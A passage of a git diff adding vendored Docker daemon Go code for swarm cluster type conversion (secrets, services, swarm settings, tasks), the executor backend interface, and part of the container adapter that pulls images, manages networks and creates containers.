0000000000..3e966873f4 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/secret.go @@ -0,0 +1,64 @@ +package convert + +import ( + swarmtypes "github.com/docker/docker/api/types/swarm" + swarmapi "github.com/docker/swarmkit/api" + "github.com/docker/swarmkit/protobuf/ptypes" +) + +// SecretFromGRPC converts a grpc Secret to a Secret. +func SecretFromGRPC(s *swarmapi.Secret) swarmtypes.Secret { + secret := swarmtypes.Secret{ + ID: s.ID, + Spec: swarmtypes.SecretSpec{ + Annotations: swarmtypes.Annotations{ + Name: s.Spec.Annotations.Name, + Labels: s.Spec.Annotations.Labels, + }, + Data: s.Spec.Data, + }, + } + + secret.Version.Index = s.Meta.Version.Index + // Meta + secret.CreatedAt, _ = ptypes.Timestamp(s.Meta.CreatedAt) + secret.UpdatedAt, _ = ptypes.Timestamp(s.Meta.UpdatedAt) + + return secret +} + +// SecretSpecToGRPC converts Secret to a grpc Secret. +func SecretSpecToGRPC(s swarmtypes.SecretSpec) swarmapi.SecretSpec { + return swarmapi.SecretSpec{ + Annotations: swarmapi.Annotations{ + Name: s.Name, + Labels: s.Labels, + }, + Data: s.Data, + } +} + +// SecretReferencesFromGRPC converts a slice of grpc SecretReference to SecretReference +func SecretReferencesFromGRPC(s []*swarmapi.SecretReference) []*swarmtypes.SecretReference { + refs := []*swarmtypes.SecretReference{} + + for _, r := range s { + ref := &swarmtypes.SecretReference{ + SecretID: r.SecretID, + SecretName: r.SecretName, + } + + if t, ok := r.Target.(*swarmapi.SecretReference_File); ok { + ref.File = &swarmtypes.SecretReferenceFileTarget{ + Name: t.File.Name, + UID: t.File.UID, + GID: t.File.GID, + Mode: t.File.Mode, + } + } + + refs = append(refs, ref) + } + + return refs +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/service.go b/vendor/github.com/docker/docker/daemon/cluster/convert/service.go new file mode 100644 index 0000000000..aa68e01f44 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/service.go @@ -0,0 +1,366 @@ +package convert + +import ( + "fmt" + "strings" + + types "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/pkg/namesgenerator" + swarmapi "github.com/docker/swarmkit/api" + "github.com/docker/swarmkit/protobuf/ptypes" +) + +// ServiceFromGRPC converts a grpc Service to a Service. +func ServiceFromGRPC(s swarmapi.Service) types.Service { + service := types.Service{ + ID: s.ID, + Spec: *serviceSpecFromGRPC(&s.Spec), + PreviousSpec: serviceSpecFromGRPC(s.PreviousSpec), + + Endpoint: endpointFromGRPC(s.Endpoint), + } + + // Meta + service.Version.Index = s.Meta.Version.Index + service.CreatedAt, _ = ptypes.Timestamp(s.Meta.CreatedAt) + service.UpdatedAt, _ = ptypes.Timestamp(s.Meta.UpdatedAt) + + // UpdateStatus + service.UpdateStatus = types.UpdateStatus{} + if s.UpdateStatus != nil { + switch s.UpdateStatus.State { + case swarmapi.UpdateStatus_UPDATING: + service.UpdateStatus.State = types.UpdateStateUpdating + case swarmapi.UpdateStatus_PAUSED: + service.UpdateStatus.State = types.UpdateStatePaused + case swarmapi.UpdateStatus_COMPLETED: + service.UpdateStatus.State = types.UpdateStateCompleted + } + + service.UpdateStatus.StartedAt, _ = ptypes.Timestamp(s.UpdateStatus.StartedAt) + service.UpdateStatus.CompletedAt, _ = ptypes.Timestamp(s.UpdateStatus.CompletedAt) + service.UpdateStatus.Message = s.UpdateStatus.Message + } + + return service +} + +func serviceSpecFromGRPC(spec *swarmapi.ServiceSpec) *types.ServiceSpec { + if spec == nil { + return nil + } + + serviceNetworks := make([]types.NetworkAttachmentConfig, 0, len(spec.Networks)) + for _, n := range spec.Networks { + serviceNetworks = append(serviceNetworks, types.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases}) + } + + taskNetworks := make([]types.NetworkAttachmentConfig, 0, len(spec.Task.Networks)) + for _, n := range spec.Task.Networks { + taskNetworks = append(taskNetworks, types.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases}) + } + + containerConfig := spec.Task.Runtime.(*swarmapi.TaskSpec_Container).Container + convertedSpec := &types.ServiceSpec{ + Annotations: types.Annotations{ + Name: spec.Annotations.Name, + Labels: spec.Annotations.Labels, + }, + + TaskTemplate: types.TaskSpec{ + ContainerSpec: containerSpecFromGRPC(containerConfig), + Resources: resourcesFromGRPC(spec.Task.Resources), + RestartPolicy: restartPolicyFromGRPC(spec.Task.Restart), + Placement: placementFromGRPC(spec.Task.Placement), + LogDriver: driverFromGRPC(spec.Task.LogDriver), + Networks: taskNetworks, + ForceUpdate: spec.Task.ForceUpdate, + }, + + Networks: serviceNetworks, + EndpointSpec: endpointSpecFromGRPC(spec.Endpoint), + } + + // UpdateConfig + if spec.Update != nil { + convertedSpec.UpdateConfig = &types.UpdateConfig{ + Parallelism: spec.Update.Parallelism, + MaxFailureRatio: spec.Update.MaxFailureRatio, + } + + convertedSpec.UpdateConfig.Delay, _ = ptypes.Duration(&spec.Update.Delay) + if spec.Update.Monitor != nil { + convertedSpec.UpdateConfig.Monitor, _ = ptypes.Duration(spec.Update.Monitor) + } + + switch spec.Update.FailureAction { + case swarmapi.UpdateConfig_PAUSE: + convertedSpec.UpdateConfig.FailureAction = types.UpdateFailureActionPause + case swarmapi.UpdateConfig_CONTINUE: + convertedSpec.UpdateConfig.FailureAction = types.UpdateFailureActionContinue + } + } + + // Mode + switch t := spec.GetMode().(type) { + case *swarmapi.ServiceSpec_Global: + convertedSpec.Mode.Global = &types.GlobalService{} + case *swarmapi.ServiceSpec_Replicated: + convertedSpec.Mode.Replicated = &types.ReplicatedService{ + Replicas: &t.Replicated.Replicas, + } + } + + return convertedSpec +} + +// ServiceSpecToGRPC converts a ServiceSpec to a grpc ServiceSpec. +func ServiceSpecToGRPC(s types.ServiceSpec) (swarmapi.ServiceSpec, error) { + name := s.Name + if name == "" { + name = namesgenerator.GetRandomName(0) + } + + serviceNetworks := make([]*swarmapi.NetworkAttachmentConfig, 0, len(s.Networks)) + for _, n := range s.Networks { + serviceNetworks = append(serviceNetworks, &swarmapi.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases}) + } + + taskNetworks := make([]*swarmapi.NetworkAttachmentConfig, 0, len(s.TaskTemplate.Networks)) + for _, n := range s.TaskTemplate.Networks { + taskNetworks = append(taskNetworks, &swarmapi.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases}) + } + + spec := swarmapi.ServiceSpec{ + Annotations: swarmapi.Annotations{ + Name: name, + Labels: s.Labels, + }, + Task: swarmapi.TaskSpec{ + Resources: resourcesToGRPC(s.TaskTemplate.Resources), + LogDriver: driverToGRPC(s.TaskTemplate.LogDriver), + Networks: taskNetworks, + ForceUpdate: s.TaskTemplate.ForceUpdate, + }, + Networks: serviceNetworks, + } + + containerSpec, err := containerToGRPC(s.TaskTemplate.ContainerSpec) + if err != nil { + return swarmapi.ServiceSpec{}, err + } + spec.Task.Runtime = &swarmapi.TaskSpec_Container{Container: containerSpec} + + restartPolicy, err := restartPolicyToGRPC(s.TaskTemplate.RestartPolicy) + if err != nil { + return swarmapi.ServiceSpec{}, err + } + spec.Task.Restart = restartPolicy + + if s.TaskTemplate.Placement != nil { + spec.Task.Placement = &swarmapi.Placement{ + Constraints: s.TaskTemplate.Placement.Constraints, + } + } + + if s.UpdateConfig != nil { + var failureAction swarmapi.UpdateConfig_FailureAction + switch s.UpdateConfig.FailureAction { + case types.UpdateFailureActionPause, "": + failureAction = swarmapi.UpdateConfig_PAUSE + case types.UpdateFailureActionContinue: + failureAction = swarmapi.UpdateConfig_CONTINUE + default: + return swarmapi.ServiceSpec{}, fmt.Errorf("unrecongized update failure action %s", s.UpdateConfig.FailureAction) + } + spec.Update = &swarmapi.UpdateConfig{ + Parallelism: s.UpdateConfig.Parallelism, + Delay: *ptypes.DurationProto(s.UpdateConfig.Delay), + FailureAction: failureAction, + MaxFailureRatio: s.UpdateConfig.MaxFailureRatio, + } + if s.UpdateConfig.Monitor != 0 { + spec.Update.Monitor = ptypes.DurationProto(s.UpdateConfig.Monitor) + } + } + + if s.EndpointSpec != nil { + if s.EndpointSpec.Mode != "" && + s.EndpointSpec.Mode != types.ResolutionModeVIP && + s.EndpointSpec.Mode != types.ResolutionModeDNSRR { + return swarmapi.ServiceSpec{}, fmt.Errorf("invalid resolution mode: %q", s.EndpointSpec.Mode) + } + + spec.Endpoint = &swarmapi.EndpointSpec{} + + spec.Endpoint.Mode = swarmapi.EndpointSpec_ResolutionMode(swarmapi.EndpointSpec_ResolutionMode_value[strings.ToUpper(string(s.EndpointSpec.Mode))]) + + for _, portConfig := range s.EndpointSpec.Ports { + spec.Endpoint.Ports = append(spec.Endpoint.Ports, &swarmapi.PortConfig{ + Name: portConfig.Name, + Protocol: swarmapi.PortConfig_Protocol(swarmapi.PortConfig_Protocol_value[strings.ToUpper(string(portConfig.Protocol))]), + PublishMode: swarmapi.PortConfig_PublishMode(swarmapi.PortConfig_PublishMode_value[strings.ToUpper(string(portConfig.PublishMode))]), + TargetPort: portConfig.TargetPort, + PublishedPort: portConfig.PublishedPort, + }) + } + } + + // Mode + if s.Mode.Global != nil && s.Mode.Replicated != nil { + return swarmapi.ServiceSpec{}, fmt.Errorf("cannot specify both replicated mode and global mode") + } + + if s.Mode.Global != nil { + spec.Mode = &swarmapi.ServiceSpec_Global{ + Global: &swarmapi.GlobalService{}, + } + } else if s.Mode.Replicated != nil && s.Mode.Replicated.Replicas != nil { + spec.Mode = &swarmapi.ServiceSpec_Replicated{ + Replicated: &swarmapi.ReplicatedService{Replicas: *s.Mode.Replicated.Replicas}, + } + } else { + spec.Mode = &swarmapi.ServiceSpec_Replicated{ + Replicated: &swarmapi.ReplicatedService{Replicas: 1}, + } + } + + return spec, nil +} + +func resourcesFromGRPC(res *swarmapi.ResourceRequirements) *types.ResourceRequirements { + var resources *types.ResourceRequirements + if res != nil { + resources = &types.ResourceRequirements{} + if res.Limits != nil { + resources.Limits = &types.Resources{ + NanoCPUs: res.Limits.NanoCPUs, + MemoryBytes: res.Limits.MemoryBytes, + } + } + if res.Reservations != nil { + resources.Reservations = &types.Resources{ + NanoCPUs: res.Reservations.NanoCPUs, + MemoryBytes: res.Reservations.MemoryBytes, + } + } + } + + return resources +} + +func resourcesToGRPC(res *types.ResourceRequirements) *swarmapi.ResourceRequirements { + var reqs *swarmapi.ResourceRequirements + if res != nil { + reqs = &swarmapi.ResourceRequirements{} + if res.Limits != nil { + reqs.Limits = &swarmapi.Resources{ + NanoCPUs: res.Limits.NanoCPUs, + MemoryBytes: res.Limits.MemoryBytes, + } + } + if res.Reservations != nil { + reqs.Reservations = &swarmapi.Resources{ + NanoCPUs: res.Reservations.NanoCPUs, + MemoryBytes: res.Reservations.MemoryBytes, + } + + } + } + return reqs +} + +func restartPolicyFromGRPC(p *swarmapi.RestartPolicy) *types.RestartPolicy { + var rp *types.RestartPolicy + if p != nil { + rp = &types.RestartPolicy{} + + switch p.Condition { + case swarmapi.RestartOnNone: + rp.Condition = types.RestartPolicyConditionNone + case swarmapi.RestartOnFailure: + rp.Condition = types.RestartPolicyConditionOnFailure + case swarmapi.RestartOnAny: + rp.Condition = types.RestartPolicyConditionAny + default: + rp.Condition = types.RestartPolicyConditionAny + } + + if p.Delay != nil { + delay, _ := ptypes.Duration(p.Delay) + rp.Delay = &delay + } + if p.Window != nil { + window, _ := ptypes.Duration(p.Window) + rp.Window = &window + } + + rp.MaxAttempts = &p.MaxAttempts + } + return rp +} + +func restartPolicyToGRPC(p *types.RestartPolicy) (*swarmapi.RestartPolicy, error) { + var rp *swarmapi.RestartPolicy + if p != nil { + rp = &swarmapi.RestartPolicy{} + + switch p.Condition { + case types.RestartPolicyConditionNone: + rp.Condition = swarmapi.RestartOnNone + case types.RestartPolicyConditionOnFailure: + rp.Condition = swarmapi.RestartOnFailure + case types.RestartPolicyConditionAny: + rp.Condition = swarmapi.RestartOnAny + default: + if string(p.Condition) != "" { + return nil, fmt.Errorf("invalid RestartCondition: %q", p.Condition) + } + rp.Condition = swarmapi.RestartOnAny + } + + if p.Delay != nil { + rp.Delay = ptypes.DurationProto(*p.Delay) + } + if p.Window != nil { + rp.Window = ptypes.DurationProto(*p.Window) + } + if p.MaxAttempts != nil { + rp.MaxAttempts = *p.MaxAttempts + + } + } + return rp, nil +} + +func placementFromGRPC(p *swarmapi.Placement) *types.Placement { + var r *types.Placement + if p != nil { + r = &types.Placement{} + r.Constraints = p.Constraints + } + + return r +} + +func driverFromGRPC(p *swarmapi.Driver) *types.Driver { + if p == nil { + return nil + } + + return &types.Driver{ + Name: p.Name, + Options: p.Options, + } +} + +func driverToGRPC(p *types.Driver) *swarmapi.Driver { + if p == nil { + return nil + } + + return &swarmapi.Driver{ + Name: p.Name, + Options: p.Options, + } +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/swarm.go b/vendor/github.com/docker/docker/daemon/cluster/convert/swarm.go new file mode 100644 index 0000000000..606e00a69b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/swarm.go @@ -0,0 +1,122 @@ +package convert + +import ( + "fmt" + "strings" + "time" + + types "github.com/docker/docker/api/types/swarm" + swarmapi "github.com/docker/swarmkit/api" + "github.com/docker/swarmkit/protobuf/ptypes" +) + +// SwarmFromGRPC converts a grpc Cluster to a Swarm. +func SwarmFromGRPC(c swarmapi.Cluster) types.Swarm { + swarm := types.Swarm{ + ClusterInfo: types.ClusterInfo{ + ID: c.ID, + Spec: types.Spec{ + Orchestration: types.OrchestrationConfig{ + TaskHistoryRetentionLimit: &c.Spec.Orchestration.TaskHistoryRetentionLimit, + }, + Raft: types.RaftConfig{ + SnapshotInterval: c.Spec.Raft.SnapshotInterval, + KeepOldSnapshots: &c.Spec.Raft.KeepOldSnapshots, + LogEntriesForSlowFollowers: c.Spec.Raft.LogEntriesForSlowFollowers, + HeartbeatTick: int(c.Spec.Raft.HeartbeatTick), + ElectionTick: int(c.Spec.Raft.ElectionTick), + }, + EncryptionConfig: types.EncryptionConfig{ + AutoLockManagers: c.Spec.EncryptionConfig.AutoLockManagers, + }, + }, + }, + JoinTokens: types.JoinTokens{ + Worker: c.RootCA.JoinTokens.Worker, + Manager: c.RootCA.JoinTokens.Manager, + }, + } + + heartbeatPeriod, _ := ptypes.Duration(c.Spec.Dispatcher.HeartbeatPeriod) + swarm.Spec.Dispatcher.HeartbeatPeriod = heartbeatPeriod + + swarm.Spec.CAConfig.NodeCertExpiry, _ = ptypes.Duration(c.Spec.CAConfig.NodeCertExpiry) + + for _, ca := range c.Spec.CAConfig.ExternalCAs { + swarm.Spec.CAConfig.ExternalCAs = append(swarm.Spec.CAConfig.ExternalCAs, &types.ExternalCA{ + Protocol: types.ExternalCAProtocol(strings.ToLower(ca.Protocol.String())), + URL: ca.URL, + Options: ca.Options, + }) + } + + // Meta + swarm.Version.Index = c.Meta.Version.Index + swarm.CreatedAt, _ = ptypes.Timestamp(c.Meta.CreatedAt) + swarm.UpdatedAt, _ = ptypes.Timestamp(c.Meta.UpdatedAt) + + // Annotations + swarm.Spec.Name = c.Spec.Annotations.Name + swarm.Spec.Labels = c.Spec.Annotations.Labels + + return swarm +} + +// SwarmSpecToGRPC converts a Spec to a grpc ClusterSpec. +func SwarmSpecToGRPC(s types.Spec) (swarmapi.ClusterSpec, error) { + return MergeSwarmSpecToGRPC(s, swarmapi.ClusterSpec{}) +} + +// MergeSwarmSpecToGRPC merges a Spec with an initial grpc ClusterSpec +func MergeSwarmSpecToGRPC(s types.Spec, spec swarmapi.ClusterSpec) (swarmapi.ClusterSpec, error) { + // We take the initSpec (either created from scratch, or returned by swarmkit), + // and will only change the value if the one taken from types.Spec is not nil or 0. + // In other words, if the value taken from types.Spec is nil or 0, we will maintain the status quo. + if s.Annotations.Name != "" { + spec.Annotations.Name = s.Annotations.Name + } + if len(s.Annotations.Labels) != 0 { + spec.Annotations.Labels = s.Annotations.Labels + } + + if s.Orchestration.TaskHistoryRetentionLimit != nil { + spec.Orchestration.TaskHistoryRetentionLimit = *s.Orchestration.TaskHistoryRetentionLimit + } + if s.Raft.SnapshotInterval != 0 { + spec.Raft.SnapshotInterval = s.Raft.SnapshotInterval + } + if s.Raft.KeepOldSnapshots != nil { + spec.Raft.KeepOldSnapshots = *s.Raft.KeepOldSnapshots + } + if s.Raft.LogEntriesForSlowFollowers != 0 { + spec.Raft.LogEntriesForSlowFollowers = s.Raft.LogEntriesForSlowFollowers + } + if s.Raft.HeartbeatTick != 0 { + spec.Raft.HeartbeatTick = uint32(s.Raft.HeartbeatTick) + } + if s.Raft.ElectionTick != 0 { + spec.Raft.ElectionTick = uint32(s.Raft.ElectionTick) + } + if s.Dispatcher.HeartbeatPeriod != 0 { + spec.Dispatcher.HeartbeatPeriod = ptypes.DurationProto(time.Duration(s.Dispatcher.HeartbeatPeriod)) + } + if s.CAConfig.NodeCertExpiry != 0 { + spec.CAConfig.NodeCertExpiry = ptypes.DurationProto(s.CAConfig.NodeCertExpiry) + } + + for _, ca := range s.CAConfig.ExternalCAs { + protocol, ok := swarmapi.ExternalCA_CAProtocol_value[strings.ToUpper(string(ca.Protocol))] + if !ok { + return swarmapi.ClusterSpec{}, fmt.Errorf("invalid protocol: %q", ca.Protocol) + } + spec.CAConfig.ExternalCAs = append(spec.CAConfig.ExternalCAs, &swarmapi.ExternalCA{ + Protocol: swarmapi.ExternalCA_CAProtocol(protocol), + URL: ca.URL, + Options: ca.Options, + }) + } + + spec.EncryptionConfig.AutoLockManagers = s.EncryptionConfig.AutoLockManagers + + return spec, nil +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/convert/task.go b/vendor/github.com/docker/docker/daemon/cluster/convert/task.go new file mode 100644 index 0000000000..d0cf89c288 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/convert/task.go @@ -0,0 +1,81 @@ +package convert + +import ( + "strings" + + types "github.com/docker/docker/api/types/swarm" + swarmapi "github.com/docker/swarmkit/api" + "github.com/docker/swarmkit/protobuf/ptypes" +) + +// TaskFromGRPC converts a grpc Task to a Task. +func TaskFromGRPC(t swarmapi.Task) types.Task { + if t.Spec.GetAttachment() != nil { + return types.Task{} + } + containerConfig := t.Spec.Runtime.(*swarmapi.TaskSpec_Container).Container + containerStatus := t.Status.GetContainer() + networks := make([]types.NetworkAttachmentConfig, 0, len(t.Spec.Networks)) + for _, n := range t.Spec.Networks { + networks = append(networks, types.NetworkAttachmentConfig{Target: n.Target, Aliases: n.Aliases}) + } + + task := types.Task{ + ID: t.ID, + Annotations: types.Annotations{ + Name: t.Annotations.Name, + Labels: t.Annotations.Labels, + }, + ServiceID: t.ServiceID, + Slot: int(t.Slot), + NodeID: t.NodeID, + Spec: types.TaskSpec{ + ContainerSpec: containerSpecFromGRPC(containerConfig), + Resources: resourcesFromGRPC(t.Spec.Resources), + RestartPolicy: restartPolicyFromGRPC(t.Spec.Restart), + Placement: placementFromGRPC(t.Spec.Placement), + LogDriver: driverFromGRPC(t.Spec.LogDriver), + Networks: networks, + }, + Status: types.TaskStatus{ + State: types.TaskState(strings.ToLower(t.Status.State.String())), + Message: t.Status.Message, + Err: t.Status.Err, + }, + DesiredState: types.TaskState(strings.ToLower(t.DesiredState.String())), + } + + // Meta + task.Version.Index = t.Meta.Version.Index + task.CreatedAt, _ = ptypes.Timestamp(t.Meta.CreatedAt) + task.UpdatedAt, _ = ptypes.Timestamp(t.Meta.UpdatedAt) + + task.Status.Timestamp, _ = ptypes.Timestamp(t.Status.Timestamp) + + if containerStatus != nil { + task.Status.ContainerStatus.ContainerID = containerStatus.ContainerID + task.Status.ContainerStatus.PID = int(containerStatus.PID) + task.Status.ContainerStatus.ExitCode = int(containerStatus.ExitCode) + } + + // NetworksAttachments + for _, na := range t.Networks { + task.NetworksAttachments = append(task.NetworksAttachments, networkAttachementFromGRPC(na)) + } + + if t.Status.PortStatus == nil { + return task + } + + for _, p := range t.Status.PortStatus.Ports { + task.Status.PortStatus.Ports = append(task.Status.PortStatus.Ports, types.PortConfig{ + Name: p.Name, + Protocol: types.PortConfigProtocol(strings.ToLower(swarmapi.PortConfig_Protocol_name[int32(p.Protocol)])), + PublishMode: types.PortConfigPublishMode(strings.ToLower(swarmapi.PortConfig_PublishMode_name[int32(p.PublishMode)])), + TargetPort: p.TargetPort, + PublishedPort: p.PublishedPort, + }) + } + + return task +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/backend.go b/vendor/github.com/docker/docker/daemon/cluster/executor/backend.go new file mode 100644 index 0000000000..0f1da38558 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/backend.go @@ -0,0 +1,61 @@ +package executor + +import ( + "io" + "time" + + "github.com/docker/distribution" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/network" + swarmtypes "github.com/docker/docker/api/types/swarm" + clustertypes "github.com/docker/docker/daemon/cluster/provider" + "github.com/docker/docker/plugin" + "github.com/docker/docker/reference" + "github.com/docker/libnetwork" + "github.com/docker/libnetwork/cluster" + networktypes "github.com/docker/libnetwork/types" + "github.com/docker/swarmkit/agent/exec" + "golang.org/x/net/context" +) + +// Backend defines the executor component for a swarm agent. +type Backend interface { + CreateManagedNetwork(clustertypes.NetworkCreateRequest) error + DeleteManagedNetwork(name string) error + FindNetwork(idName string) (libnetwork.Network, error) + SetupIngress(req clustertypes.NetworkCreateRequest, nodeIP string) error + PullImage(ctx context.Context, image, tag string, metaHeaders map[string][]string, authConfig *types.AuthConfig, outStream io.Writer) error + CreateManagedContainer(config types.ContainerCreateConfig) (container.ContainerCreateCreatedBody, error) + ContainerStart(name string, hostConfig *container.HostConfig, checkpoint string, checkpointDir string) error + ContainerStop(name string, seconds *int) error + ContainerLogs(context.Context, string, *backend.ContainerLogsConfig, chan struct{}) error + ConnectContainerToNetwork(containerName, networkName string, endpointConfig *network.EndpointSettings) error + ActivateContainerServiceBinding(containerName string) error + DeactivateContainerServiceBinding(containerName string) error + UpdateContainerServiceConfig(containerName string, serviceConfig *clustertypes.ServiceConfig) error + ContainerInspectCurrent(name string, size bool) (*types.ContainerJSON, error) + ContainerWaitWithContext(ctx context.Context, name string) error + ContainerRm(name string, config *types.ContainerRmConfig) error + ContainerKill(name string, sig uint64) error + SetContainerSecretStore(name string, store exec.SecretGetter) error + SetContainerSecretReferences(name string, refs []*swarmtypes.SecretReference) error + SystemInfo() (*types.Info, error) + VolumeCreate(name, driverName string, opts, labels map[string]string) (*types.Volume, error) + Containers(config *types.ContainerListOptions) ([]*types.Container, error) + SetNetworkBootstrapKeys([]*networktypes.EncryptionKey) error + DaemonJoinsCluster(provider cluster.Provider) + DaemonLeavesCluster() + IsSwarmCompatible() error + SubscribeToEvents(since, until time.Time, filter filters.Args) ([]events.Message, chan interface{}) + UnsubscribeFromEvents(listener chan interface{}) + UpdateAttachment(string, string, string, *network.NetworkingConfig) error + WaitForDetachment(context.Context, string, string, string, string) error + GetRepository(context.Context, reference.NamedTagged, *types.AuthConfig) (distribution.Repository, bool, error) + LookupImage(name string) (*types.ImageInspect, error) + PluginManager() *plugin.Manager + PluginGetter() *plugin.Store +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/executor/container/adapter.go b/vendor/github.com/docker/docker/daemon/cluster/executor/container/adapter.go new file mode 100644 index 0000000000..f82f8b54d3 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/executor/container/adapter.go @@ -0,0 +1,463 @@ +package container + +import ( + "encoding/base64" + "encoding/json" + "fmt" + "io" + "os" + "strings" + "syscall" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/distribution/digest" + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/backend" + containertypes "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/events" + "github.com/docker/docker/daemon/cluster/convert" + executorpkg "github.com/docker/docker/daemon/cluster/executor" + "github.com/docker/docker/reference" + "github.com/docker/libnetwork" + "github.com/docker/swarmkit/agent/exec" + "github.com/docker/swarmkit/api" + "github.com/docker/swarmkit/log" + "github.com/docker/swarmkit/protobuf/ptypes" + "golang.org/x/net/context" + "golang.org/x/time/rate" +) + +// containerAdapter conducts remote operations for a container. All calls +// are mostly naked calls to the client API, seeded with information from +// containerConfig. +type containerAdapter struct { + backend executorpkg.Backend + container *containerConfig + secrets exec.SecretGetter +} + +func newContainerAdapter(b executorpkg.Backend, task *api.Task, secrets exec.SecretGetter) (*containerAdapter, error) { + ctnr, err := newContainerConfig(task) + if err != nil { + return nil, err + } + + return &containerAdapter{ + container: ctnr, + backend: b, + secrets: secrets, + }, nil +} + +func (c *containerAdapter) pullImage(ctx context.Context) error { + spec := c.container.spec() + + // Skip pulling if the image is referenced by image ID. + if _, err := digest.ParseDigest(spec.Image); err == nil { + return nil + } + + // Skip pulling if the image is referenced by digest and already + // exists locally. + named, err := reference.ParseNamed(spec.Image) + if err == nil { + if _, ok := named.(reference.Canonical); ok { + _, err := c.backend.LookupImage(spec.Image) + if err == nil { + return nil + } + } + } + + // if the image needs to be pulled, the auth config will be retrieved and updated + var encodedAuthConfig string + if spec.PullOptions != nil { + encodedAuthConfig = spec.PullOptions.RegistryAuth + } + + authConfig := &types.AuthConfig{} + if encodedAuthConfig != "" { + if err := json.NewDecoder(base64.NewDecoder(base64.URLEncoding, strings.NewReader(encodedAuthConfig))).Decode(authConfig); err != nil { + logrus.Warnf("invalid authconfig: %v", err) + } + } + + pr, pw := io.Pipe() + metaHeaders := map[string][]string{} + go func() { + err := c.backend.PullImage(ctx, c.container.image(), "", metaHeaders, authConfig, pw) + pw.CloseWithError(err) + }() + + dec := json.NewDecoder(pr) + dec.UseNumber() + m := map[string]interface{}{} + spamLimiter := rate.NewLimiter(rate.Every(time.Second), 1) + + lastStatus := "" + for { + if err := dec.Decode(&m); err != nil { + if err == io.EOF { + break + } + return err + } + l := log.G(ctx) + // limit pull progress logs unless the status changes + if spamLimiter.Allow() || lastStatus != m["status"] { + // if we have progress details, we have everything we need + if progress, ok := m["progressDetail"].(map[string]interface{}); ok { + // first, log the image and status + l = l.WithFields(logrus.Fields{ + "image": c.container.image(), + "status": m["status"], + }) + // then, if we have progress, log the progress + if progress["current"] != nil && progress["total"] != nil { + l = l.WithFields(logrus.Fields{ + "current": progress["current"], + "total": progress["total"], + }) + } + } + l.Debug("pull in progress") + } + // sometimes, we get no useful information at all, and add no fields + if status, ok := m["status"].(string); ok { + lastStatus = status + } + } + + // if the final stream object contained an error, return it + if errMsg, ok := m["error"]; ok { + return fmt.Errorf("%v", errMsg) + } + return nil +} + +func (c *containerAdapter) createNetworks(ctx context.Context) error { + for _, network := range c.container.networks() { + ncr, err := c.container.networkCreateRequest(network) + if err != nil { + return err + } + + if err := c.backend.CreateManagedNetwork(ncr); err != nil { // todo name missing + if _, ok := err.(libnetwork.NetworkNameError); ok { + continue + } + + return err + } + } + + return nil +} + +func (c *containerAdapter) removeNetworks(ctx context.Context) error { + for _, nid := range c.container.networks() { + if err := c.backend.DeleteManagedNetwork(nid); err != nil { + switch err.(type) { + case *libnetwork.ActiveEndpointsError: + continue + case libnetwork.ErrNoSuchNetwork: + continue + default: + log.G(ctx).Errorf("network %s remove failed: %v", nid, err) + return err + } + } + } + + return nil +} + +func (c *containerAdapter) networkAttach(ctx context.Context) error { + config := c.container.createNetworkingConfig() + + var ( + networkName string + networkID string + ) + + if config != nil { + for n, epConfig := range config.EndpointsConfig { + networkName = n + networkID = epConfig.NetworkID + break + } + } + + return c.backend.UpdateAttachment(networkName, networkID, c.container.id(), config) +} + +func (c *containerAdapter) waitForDetach(ctx context.Context) error { + config := c.container.createNetworkingConfig() + + var ( + networkName string + networkID string + ) + + if config != nil { + for n, epConfig := range config.EndpointsConfig { + networkName = n + networkID = epConfig.NetworkID + break + } + } + + return c.backend.WaitForDetachment(ctx, networkName, networkID, c.container.taskID(), c.container.id()) +} + +func (c *containerAdapter) create(ctx context.Context) error { + var cr containertypes.ContainerCreateCreatedBody + var err error + + if cr, err = c.backend.CreateManagedContainer(types.ContainerCreateConfig{ + Name: c.container.name(), + Config: c.container.config(), + HostConfig: c.container.hostConfig(), + // Use the first network in container create + NetworkingConfig: c.container.createNetworkingConfig(), + }); err != nil { + return err + } + + // Docker daemon currently doesn't support multiple networks in container create + // Connect to all other networks + nc := c.container.connectNetworkingConfig() + + if nc != nil { + for n, ep := range nc.EndpointsConfig { + if err := c.backend.ConnectContainerToNetwork(cr.ID, n, ep); err != nil { + return err + } + } + } + + container := c.container.task.Spec.GetContainer() + if container == nil { + return fmt.Errorf("unable to get container from task spec") + } + + // configure secrets + if err := c.backend.SetContainerSecretStore(cr.ID, c.secrets); err != nil { + return err + } + + refs := convert.SecretReferencesFromGRPC(container.Secrets) + if err := c.backend.SetContainerSecretReferences(cr.ID, refs); err != nil { + return err + } + + if err := c.backend.UpdateContainerServiceConfig(cr.ID, c.container.serviceConfig()); err != nil { + return err + } + + return nil +} + +// checkMounts ensures that the provided mounts won't have any host-specific +// problems at start up. For example, we disallow bind mounts without an +// existing path, which slightly different from the container API. +func (c *containerAdapter) checkMounts() error { + spec := c.container.spec() + for _, mount := range spec.Mounts { + switch mount.Type { + case api.MountTypeBind: + if _, err := os.Stat(mount.Source); os.IsNotExist(err) { + return fmt.Errorf("invalid bind mount source, source path not found: %s", mount.Source) + } + } + } + + return nil +} + +func (c *containerAdapter) start(ctx context.Context) error { + if err := c.checkMounts(); err != nil { + return err + } + + return c.backend.ContainerStart(c.container.name(), nil, "", "") +} + +func (c *containerAdapter) inspect(ctx context.Context) 